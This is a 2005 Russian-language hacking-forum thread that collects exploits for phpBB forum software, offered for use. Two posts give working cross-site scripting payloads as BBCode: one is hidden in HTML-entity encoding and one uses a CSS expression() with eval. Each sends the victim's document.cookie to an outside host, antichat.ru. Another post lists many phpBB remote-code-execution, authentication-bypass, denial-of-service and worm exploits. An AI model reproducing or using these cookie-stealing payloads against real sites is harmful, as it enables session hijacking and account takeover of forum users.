Форумы Эксплойты для phpbb

Discussion in 'Уязвимости CMS/форумов' started by *Van*, 9 Dec 2005.

Thread Status:
Not open for further replies.
  1. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    Так как помимо ipb, много вопросов есть и по phpbb форумам, я решил с позволения модеров создать эту тему, на которую можно будет ссылаться а не послать в поиск. Здесь я размещу всякие эксплойты и т.д. =)
    Будут выкладываться эксплойты для всех версий.
     
    #1 *Van*, 9 Dec 2005
    Last edited: 9 Dec 2005
  2. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
  3. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    _________________________
    2 people like this.
  4. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    phpBB 2.0.18
    HTML:
    [url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url]
     
    1 person likes this.
  5. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    2005-10-11 phpBB 2.0.13 (admin_styles.php) Remote
    Command Execution Exploit 6680 R D RusH
    2005-07-19 phpBB 2.0.15 Remote PHP Code Execution
    Exploit (metasploit) 10311 R M D str0ke
    2005-07-13 phpBB <= 2.0.16 XSS Remote Cookie
    Disclosure Exploit (cookie grabber) 5813 R D suBzero
    2005-07-08 phpBB <= 2.0.16 XSS Remote Cookie
    Disclosure Exploit 10273 R D D|ablo 2005-07-03 phpBB 2.0.15 (highlight) Database
    Authentication Details Exploit 11755 R M D SecureD
    2005-06-29 phpBB 2.0.15 (highlight) Remote PHP
    Code Execution 7951 R M D rattle
    2005-06-22 phpBB <= 2.0.15 Register Multiple
    Users Denial of Service (perl code) 4187 R D g30rg3_x
    2005-06-22 phpBB <= 2.0.15 Register Multiple
    Users Denial of Service (c code) 2684 R D HaCkZaTaN
    2005-04-04 phpBB <= 2.0.13 'Calendar Pro' mod
    Remote Exploit 3803 R D CereBrums
    2005-04-02 phpBB <= 2.0.13 'downloads.php' mod
    Remote Exploit 6635 R D CereBrums
    2005-03-24 phpBB <= 2.0.12 Change User Rights
    Authentication Bypass (c code) 4670 R D str0ke
    2005-03-21 phpBB <= 2.0.12 Change User Rights
    Authentication Bypass 7392 R D Kutas
    2005-03-11 phpBB <= 2.0.12 Session Handling
    Authentication Bypass (tutorial 2) 8675 R D Ali7
    2005-03-05 phpBB <= 2.0.12 Session Handling
    Authentication Bypass (tutorial) 4825 R D PPC
    2005-01-04 phpBB <= 2.0.10 Bot Install (Altavista)
    (ssh.D.Worm) 2436 R D Severino Honorato
    2004-12-25 Sanity.b - phpBB <= 2.0.10 Bot Install
    (AOL/Yahoo Search) 1717 R D n/a
    2004-12-22 phpBB highlight Arbitrary File Upload
    (Santy.A) 1956 R D n/a
    2004-12-17 PHP <= 4.3.9 & phpBB 2.x with
    unserialize() Remote Exploit (compiled) 2184 R D overdose
    2004-12-05 phpBB v1.0.0 - 2.0.10 admin_cash.php
    remote exploit 2279 R D evilrabbi
    2004-12-03 phpBB <= 2.0.10 Remote Command
    Execution Exploit (cgi version) 2372 R M D ZzagorR
    2004-11-22 phpBB <= 2.0.10 Remote Command
    Execution Exploit 4447 R M D RusH
    2003-12-21 phpBB 2.0.6 search_id sql injection MD5
    Hash Remote Exploit 2482 R D RusH
    2003-06-30 phpBB 2.0.4 Remote php File Include
    Exploit 1735 R D Spoofed
    2003-06-20 phpBB 2.0.5 SQL Injection password
    disclosure Exploit 2316 R D Rick Patel

    HTML:
    [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
    Всем вам в помощь=))
     
    2 people like this.
  6. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    Все кто хочет помочь в создании темы, баги в личку,тему в топку.
    Скоро будет созданы темы-баглисты типа этого.
     
Thread Status:
Not open for further replies.